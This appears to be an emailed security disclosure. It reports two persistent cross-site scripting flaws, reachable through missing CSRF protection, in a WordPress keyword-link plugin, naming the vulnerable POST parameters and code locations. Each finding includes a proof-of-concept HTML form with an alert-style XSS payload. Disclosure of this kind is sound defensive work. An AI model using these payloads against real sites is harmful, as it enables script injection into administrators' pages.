Hello,
1. Persistent Cross-Site Scripting (XSS)
Authenticated administrators can store html/js code (there is no CSRF protection).
Method: POST
Vulnerable parameters: limit
Example PHP callstack:
wp_options_page [/rejected-wp-keyword-link-rejected/wp_similarity.php:483]
Verification:
--
<input type="text" name="update_options" value="1" />
<input type="text" name="limit" value='"><img src=x onerror=alert(1) />'>
<input type="submit" />
</form>
--
2. Persistent Cross-Site Scripting (XSS)
Authenticated administrators can store html/js code (there is no CSRF protection).
Method: POST
Vulnerable parameters: match_num_from, match_num_to
Example PHP callstack:
wp_keywordlink_global_options [/rejected-wp-keyword-link-rejected/wp_keywordlink.php:360]
Verification:
--
<input type="text" name="action" value="global_options" />
<input type="text" name="match_num_from" value='"><img src=x onerror=alert(1) />'>
<input type="text" name="match_num_to" value='"><img src=x onerror=alert(2) />'>
<input type="submit" />
</form>
--
--
Regards,
Marcin Probola,